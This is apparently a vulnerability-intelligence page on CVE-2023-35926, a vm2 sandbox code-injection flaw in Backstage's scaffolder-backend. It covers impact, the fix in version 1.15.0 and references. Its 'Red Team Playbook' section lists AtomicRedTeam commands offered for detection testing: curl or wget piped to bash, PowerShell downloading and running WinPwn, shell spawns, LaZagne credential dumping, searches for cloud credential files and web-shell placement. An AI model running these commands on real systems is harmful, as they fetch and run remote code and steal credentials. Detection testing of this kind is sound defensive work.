CVE-2023-35926
Overview
This vulnerability is a code injection flaw rooted in the use of an insecure sandboxing library within the Backstage scaffolder-backend plugin. The plugin previously relied on the vm2 library for sandboxing templated code execution, which is inherently risky due to its design allowing code injection. The vulnerability arises from the templating mechanism in the scaffolder-backend component that processes YAML-defined scaffolder templates, enabling malicious manipulation of template code execution.
Vulnerability Description
Backstage is an open platform for building developer portals. The Backstage scaffolder-backend plugin uses a templating library that requires sandbox, as it by design allows for code injection. The library used for this sandbox so far has been `vm2`, but in light of several past vulnerabilities and existing vulnerabilities that may not have a fix, the plugin has switched to using a different sandbox library. A malicious actor with write access to a registered scaffolder template could manipulate the template in a way that allows for remote code execution on the scaffolder-backend instance. This was only exploitable in the template YAML definition itself and not by user input data. This is vulnerability is fixed in version 1.15.0 of `@backstage/plugin-scaffolder-backend`.
Impact
An attacker with write permissions on a scaffolder template can execute arbitrary code remotely on the scaffolder-backend instance, potentially compromising the host environment. This requires authenticated access with high privileges to modify templates but no user interaction is needed. The exploit could lead to full system compromise, data exposure, or service disruption. According to the CVSS vector, the attack requires network access (AV:N), high attack complexity (AC:H), and high privileges (PR:H), but no user interaction (UI:N).
Solution
To remediate this vulnerability, upgrade the @backstage/plugin-scaffolder-backend package to version 1.15.0 or later, where the sandboxing library has been replaced to mitigate code injection risks. Detailed patch instructions and advisory information are available in the Backstage GitHub security advisory GHSA-wg6p-jmpc-xjmr and the release notes for version 1.15.0 at https://github.com/backstage/backstage/releases/tag/v1.15.0. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Backstage scaffolder-backend plugin arises from its reliance on a templating library that permits code injection, necessitating a sandboxing mechanism to mitigate risks. The previous library, `vm2`, has been associated with multiple vulnerabilities, prompting a transition to a different sandboxing solution. This vulnerability is particularly concerning because it allows a malicious actor with write access to a registered scaffolder template to manipulate the template in such a way that remote code execution can occur on the backend instance. The exploitation is limited to the template YAML definition, meaning that user input data does not directly contribute to the risk, which narrows the attack surface but does not eliminate it.
Attack vectors for this vulnerability primarily involve an insider threat or a compromised account with write permissions to the scaffolder templates. An attacker could craft a malicious template that, when processed by the backend, executes arbitrary code on the server. This could lead to unauthorized access to sensitive data, manipulation of the backend environment, or even lateral movement within the network. Scenarios may include an attacker embedding malicious scripts within the YAML definition, which, when executed, could leverage the server's privileges to access other systems or data repositories.
The real-world impact of this vulnerability is significant, especially for organizations utilizing Backstage for their developer portals. The high CVSS score of 9.9 indicates that successful exploitation could lead to severe consequences, including data breaches, service disruptions, and reputational damage. Organizations may face compliance issues if sensitive data is exposed due to an exploit, leading to potential legal ramifications and financial penalties. Additionally, the operational impact could be profound, as the exploitation of this vulnerability could result in downtime or the need for extensive remediation efforts, diverting resources from other critical projects.
To detect and mitigate this vulnerability, organizations should adopt a multi-faceted approach. Regular audits of access controls are essential to ensure that only authorized personnel have write access to scaffolder templates. Implementing monitoring solutions that can detect unusual changes to templates or unexpected execution patterns on the backend can provide early warning signs of exploitation attempts. Furthermore, upgrading to the fixed version of the plugin is crucial, as it addresses the vulnerability by employing a more secure sandboxing library. Organizations should also consider implementing a robust security training program for developers to raise awareness about the risks associated with code injection and the importance of secure coding practices.
In conclusion, the vulnerability within the Backstage scaffolder-backend plugin highlights the critical need for vigilant security practices in software development environments. The potential for remote code execution poses a serious threat, particularly when combined with inadequate access controls. By understanding the technical details, recognizing the attack vectors, assessing the real-world impact, and implementing effective detection and mitigation strategies, organizations can better protect themselves against such vulnerabilities and enhance their overall security posture.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Linuxfoundation | Backstage | All |
cpe:2.3:a:linuxfoundation:backstage:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Threat Feed
0 eventsNo threat activity recorded for this CVE.
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-35926 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/backstage/backstage/security/advisories/GHSA-wg6p-jmpc-xjmr |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/backstage/backstage/commit/fb7375507d56faedcb7bb3665480070593c8949a |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/backstage/backstage/releases/tag/v1.15.0 |